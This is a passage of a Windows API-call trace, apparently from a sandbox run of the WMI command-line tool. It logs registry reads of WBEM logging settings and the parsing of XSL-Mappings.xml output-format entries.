	[0035.976] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0035.976] SysStringLen (param_1="DEFAULT") returned 0x7
	[0035.976] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0035.976] SysStringLen (param_1="NONE") returned 0x4
	[0035.976] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0035.976] SysStringLen (param_1="PKT") returned 0x3
	[0035.976] SysStringLen (param_1="PKT") returned 0x3
	[0035.976] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0035.976] malloc (_Size=0x30) returned 0x138000
	[0035.976] malloc (_Size=0x18) returned 0x136cc0
	[0035.977] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0035.977] SysStringLen (param_1="DEFAULT") returned 0x7
	[0035.977] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0035.977] SysStringLen (param_1="PKT") returned 0x3
	[0035.977] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0035.977] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0035.977] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0035.977] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0035.977] malloc (_Size=0x30) returned 0x138040
	[0035.977] malloc (_Size=0x40) returned 0x136ce0
	[0035.977] malloc (_Size=0x20a) returned 0x138fd0
	[0035.977] GetSystemDirectoryW (in: lpBuffer=0x138fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0035.977] free (_Block=0x138fd0) 
	[0035.977] malloc (_Size=0x18) returned 0x136d30
	[0035.977] malloc (_Size=0x18) returned 0x136d50
	[0035.977] malloc (_Size=0x18) returned 0x136d70
	[0035.977] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
	[0035.977] SysStringLen (param_1="\\wbem\\") returned 0x6
	[0035.977] free (_Block=0x136d30) 
	[0035.978] free (_Block=0x136d50) 
	[0035.978] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32
	[0035.978] free (_Block=0x136d70) 
	[0035.978] malloc (_Size=0x18) returned 0x136d30
	[0035.978] malloc (_Size=0x18) returned 0x136d50
	[0035.978] malloc (_Size=0x18) returned 0x136d70
	[0035.978] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19
	[0035.978] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10
	[0035.978] free (_Block=0x136d30) 
	[0035.978] free (_Block=0x136d50) 
	[0035.978] GetCurrentThreadId () returned 0x9d4
	[0035.978] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1bf270 | out: phkResult=0x1bf270*=0xf8) returned 0x0
	[0035.978] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1bf2c0, lpcbData=0x1bf260*=0x400 | out: lpType=0x0, lpData=0x1bf2c0*=0x30, lpcbData=0x1bf260*=0x4) returned 0x0
	[0035.978] _wcsicmp (_String1="0", _String2="1") returned -1
	[0035.978] _wcsicmp (_String1="0", _String2="2") returned -2
	[0035.978] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1bf260*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1bf260*=0x42) returned 0x0
	[0035.978] malloc (_Size=0x86) returned 0x136d90
	[0035.978] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x136d90, lpcbData=0x1bf260*=0x42 | out: lpType=0x0, lpData=0x136d90*=0x25, lpcbData=0x1bf260*=0x42) returned 0x0
	[0035.978] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
	[0035.978] malloc (_Size=0x42) returned 0x136e20
	[0035.978] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
	[0035.978] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1bf2c0, lpcbData=0x1bf260*=0x400 | out: lpType=0x0, lpData=0x1bf2c0*=0x36, lpcbData=0x1bf260*=0xc) returned 0x0
	[0035.979] _wtol (_String="65536") returned 65536
	[0035.979] free (_Block=0x136d90) 
	[0035.979] RegCloseKey (hKey=0x0) returned 0x6
	[0035.979] CoCreateInstance (in: rclsid=0xff697410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff6973f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1bf768 | out: ppv=0x1bf768*=0x21b71d0) returned 0x0
	[0036.291] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x21b71d0, xmlSource=0x1bf8b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x136d30), isSuccessful=0x1bf920 | out: isSuccessful=0x1bf920*=0xffff) returned 0x0
	[0040.145] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21b71d0, DOMElement=0x1bf760 | out: DOMElement=0x1bf760*=0x21bbc50) returned 0x0
	[0040.145] malloc (_Size=0x18) returned 0x136d30
	[0040.146] IXMLDOMElement:getElementsByTagName (in: This=0x21bbc50, tagName="XSLFORMAT", resultList=0x1bf770 | out: resultList=0x1bf770*=0x21b9cc0) returned 0x0
	[0040.149] free (_Block=0x136d30) 
	[0040.149] IXMLDOMNodeList:get_length (in: This=0x21b9cc0, listLength=0x1bf938 | out: listLength=0x1bf938*=21) returned 0x0
	[0040.151] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=0, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.151] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="texttable.xsl") returned 0x0
	[0040.151] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.151] malloc (_Size=0x18) returned 0x136d30
	[0040.151] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.151] free (_Block=0x136d30) 
	[0040.151] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0
	[0040.151] malloc (_Size=0x18) returned 0x136d30
	[0040.151] malloc (_Size=0x18) returned 0x136d50
	[0040.152] malloc (_Size=0x30) returned 0x138080
	[0040.152] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.152] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.152] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.152] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=1, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.152] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="textvaluelist.xsl") returned 0x0
	[0040.152] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.152] malloc (_Size=0x18) returned 0x136e70
	[0040.152] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.152] free (_Block=0x136e70) 
	[0040.152] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0
	[0040.152] malloc (_Size=0x18) returned 0x13c270
	[0040.152] malloc (_Size=0x18) returned 0x13c290
	[0040.152] SysStringLen (param_1="VALUE") returned 0x5
	[0040.152] SysStringLen (param_1="TABLE") returned 0x5
	[0040.152] SysStringLen (param_1="TABLE") returned 0x5
	[0040.152] SysStringLen (param_1="VALUE") returned 0x5
	[0040.152] malloc (_Size=0x30) returned 0x1380c0
	[0040.152] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.152] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.152] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.152] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=2, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.153] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="textvaluelist.xsl") returned 0x0
	[0040.153] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.153] malloc (_Size=0x18) returned 0x13c2b0
	[0040.153] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.153] free (_Block=0x13c2b0) 
	[0040.153] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0
	[0040.153] malloc (_Size=0x18) returned 0x13c2b0
	[0040.153] malloc (_Size=0x18) returned 0x13c2d0
	[0040.153] SysStringLen (param_1="LIST") returned 0x4
	[0040.153] SysStringLen (param_1="TABLE") returned 0x5
	[0040.153] malloc (_Size=0x30) returned 0x138100
	[0040.153] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.153] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.153] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.153] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=3, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.153] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="rawxml.xsl") returned 0x0
	[0040.153] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.153] malloc (_Size=0x18) returned 0x13c2f0
	[0040.153] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.153] free (_Block=0x13c2f0) 
	[0040.153] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0
	[0040.154] malloc (_Size=0x18) returned 0x13c2f0
	[0040.154] malloc (_Size=0x18) returned 0x13c310
	[0040.154] SysStringLen (param_1="RAWXML") returned 0x6
	[0040.154] SysStringLen (param_1="TABLE") returned 0x5
	[0040.154] SysStringLen (param_1="RAWXML") returned 0x6
	[0040.154] SysStringLen (param_1="LIST") returned 0x4
	[0040.154] SysStringLen (param_1="LIST") returned 0x4
	[0040.154] SysStringLen (param_1="RAWXML") returned 0x6
	[0040.154] malloc (_Size=0x30) returned 0x138140
	[0040.154] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.154] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.154] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.154] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=4, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.154] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="htable.xsl") returned 0x0
	[0040.154] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.154] malloc (_Size=0x18) returned 0x13c330
	[0040.154] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.154] free (_Block=0x13c330) 
	[0040.154] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0
	[0040.154] malloc (_Size=0x18) returned 0x13c330
	[0040.154] malloc (_Size=0x18) returned 0x13c350
	[0040.154] SysStringLen (param_1="HTABLE") returned 0x6
	[0040.154] SysStringLen (param_1="TABLE") returned 0x5
	[0040.154] SysStringLen (param_1="HTABLE") returned 0x6
	[0040.154] SysStringLen (param_1="LIST") returned 0x4
	[0040.154] malloc (_Size=0x30) returned 0x138180
	[0040.155] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.155] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.155] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.155] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=5, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.155] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="hform.xsl") returned 0x0
	[0040.155] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.155] malloc (_Size=0x18) returned 0x13c370
	[0040.155] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.155] free (_Block=0x13c370) 
	[0040.155] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0
	[0040.155] malloc (_Size=0x18) returned 0x13c370
	[0040.155] malloc (_Size=0x18) returned 0x13c390
	[0040.155] SysStringLen (param_1="HFORM") returned 0x5
	[0040.155] SysStringLen (param_1="TABLE") returned 0x5
	[0040.155] SysStringLen (param_1="HFORM") returned 0x5
	[0040.155] SysStringLen (param_1="LIST") returned 0x4
	[0040.155] SysStringLen (param_1="HFORM") returned 0x5
	[0040.155] SysStringLen (param_1="HTABLE") returned 0x6
	[0040.155] malloc (_Size=0x30) returned 0x1381c0
	[0040.155] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.155] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.155] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.155] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=6, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.155] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="xml.xsl") returned 0x0
	[0040.155] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.156] malloc (_Size=0x18) returned 0x13c3b0
	[0040.156] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.156] free (_Block=0x13c3b0) 
	[0040.156] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0
	[0040.156] malloc (_Size=0x18) returned 0x13c3b0
	[0040.156] malloc (_Size=0x18) returned 0x13c3d0
	[0040.156] SysStringLen (param_1="XML") returned 0x3
	[0040.156] SysStringLen (param_1="TABLE") returned 0x5
	[0040.156] SysStringLen (param_1="XML") returned 0x3
	[0040.156] SysStringLen (param_1="VALUE") returned 0x5
	[0040.156] SysStringLen (param_1="VALUE") returned 0x5
	[0040.156] SysStringLen (param_1="XML") returned 0x3
	[0040.156] malloc (_Size=0x30) returned 0x138200
	[0040.156] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.156] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.156] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.156] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=7, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.156] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="mof.xsl") returned 0x0
	[0040.156] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.156] malloc (_Size=0x18) returned 0x13c3f0
	[0040.156] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.156] free (_Block=0x13c3f0) 
	[0040.156] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0
	[0040.156] malloc (_Size=0x18) returned 0x13c3f0
	[0040.157] malloc (_Size=0x18) returned 0x13c410
	[0040.157] SysStringLen (param_1="MOF") returned 0x3
	[0040.157] SysStringLen (param_1="TABLE") returned 0x5
	[0040.157] SysStringLen (param_1="MOF") returned 0x3
	[0040.157] SysStringLen (param_1="LIST") returned 0x4
	[0040.157] SysStringLen (param_1="MOF") returned 0x3
	[0040.157] SysStringLen (param_1="RAWXML") returned 0x6
	[0040.157] SysStringLen (param_1="LIST") returned 0x4
	[0040.157] SysStringLen (param_1="MOF") returned 0x3
	[0040.157] malloc (_Size=0x30) returned 0x138240
	[0040.157] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.157] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.157] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.157] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=8, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.157] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="csv.xsl") returned 0x0
	[0040.157] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.157] malloc (_Size=0x18) returned 0x13c430
	[0040.157] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.160] free (_Block=0x13c430) 
	[0040.160] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0
	[0040.160] malloc (_Size=0x18) returned 0x13c430
	[0040.160] malloc (_Size=0x18) returned 0x13c450
	[0040.160] SysStringLen (param_1="CSV") returned 0x3
	[0040.160] SysStringLen (param_1="TABLE") returned 0x5
	[0040.160] SysStringLen (param_1="CSV") returned 0x3
	[0040.160] SysStringLen (param_1="LIST") returned 0x4
	[0040.160] SysStringLen (param_1="CSV") returned 0x3
	[0040.160] SysStringLen (param_1="HTABLE") returned 0x6
	[0040.160] SysStringLen (param_1="CSV") returned 0x3
	[0040.160] SysStringLen (param_1="HFORM") returned 0x5
	[0040.160] malloc (_Size=0x30) returned 0x138280
	[0040.160] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.161] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.161] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.161] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=9, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.161] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="texttable.xsl") returned 0x0
	[0040.161] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.161] malloc (_Size=0x18) returned 0x13c470
	[0040.161] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.161] free (_Block=0x13c470) 
	[0040.161] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0
	[0040.161] malloc (_Size=0x18) returned 0x13c470
	[0040.161] malloc (_Size=0x18) returned 0x13c490
	[0040.161] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.161] SysStringLen (param_1="TABLE") returned 0x5
	[0040.161] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.161] SysStringLen (param_1="VALUE") returned 0x5
	[0040.161] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.161] SysStringLen (param_1="XML") returned 0x3
	[0040.161] SysStringLen (param_1="XML") returned 0x3
	[0040.161] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.161] malloc (_Size=0x30) returned 0x1382c0
	[0040.161] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.161] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.161] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.161] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=10, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.161] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="texttable.xsl") returned 0x0
	[0040.161] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.162] malloc (_Size=0x18) returned 0x13c4b0
	[0040.162] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.162] free (_Block=0x13c4b0) 
	[0040.162] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0
	[0040.162] malloc (_Size=0x18) returned 0x13c4b0
	[0040.162] malloc (_Size=0x18) returned 0x13c4d0
	[0040.162] SysStringLen (param_1="texttablewsys") returned 0xd
	[0040.162] SysStringLen (param_1="TABLE") returned 0x5
	[0040.162] SysStringLen (param_1="texttablewsys") returned 0xd
	[0040.162] SysStringLen (param_1="XML") returned 0x3
	[0040.162] SysStringLen (param_1="texttablewsys") returned 0xd
	[0040.162] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.162] SysStringLen (param_1="XML") returned 0x3
	[0040.162] SysStringLen (param_1="texttablewsys") returned 0xd
	[0040.162] malloc (_Size=0x30) returned 0x138300
	[0040.162] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.162] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.162] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.162] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=11, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.162] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="texttable.xsl") returned 0x0
	[0040.162] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.162] malloc (_Size=0x18) returned 0x13c4f0
	[0040.162] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.163] free (_Block=0x13c4f0) 
	[0040.163] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0
	[0040.163] malloc (_Size=0x18) returned 0x13c4f0
	[0040.163] malloc (_Size=0x18) returned 0x13c510
	[0040.163] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0040.163] SysStringLen (param_1="TABLE") returned 0x5
	[0040.163] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0040.163] SysStringLen (param_1="XML") returned 0x3
	[0040.163] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0040.163] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.163] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.163] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0040.163] malloc (_Size=0x30) returned 0x138340
	[0040.163] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.163] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.163] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.163] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=12, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.163] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="texttable.xsl") returned 0x0
	[0040.163] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.163] malloc (_Size=0x18) returned 0x13c530
	[0040.163] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.163] free (_Block=0x13c530) 
	[0040.163] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0
	[0040.163] malloc (_Size=0x18) returned 0x13c530
	[0040.163] malloc (_Size=0x18) returned 0x13c550
	[0040.164] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0040.164] SysStringLen (param_1="TABLE") returned 0x5
	[0040.164] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0040.164] SysStringLen (param_1="XML") returned 0x3
	[0040.164] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0040.164] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.164] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0040.164] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0040.164] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.164] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0040.164] malloc (_Size=0x30) returned 0x138380
	[0040.164] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.164] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.164] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.164] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=13, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.164] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="texttable.xsl") returned 0x0
	[0040.164] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.164] malloc (_Size=0x18) returned 0x13c570
	[0040.164] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.164] free (_Block=0x13c570) 
	[0040.164] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0
	[0040.164] malloc (_Size=0x18) returned 0x13c570
	[0040.164] malloc (_Size=0x18) returned 0x13c590
	[0040.164] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0040.164] SysStringLen (param_1="TABLE") returned 0x5
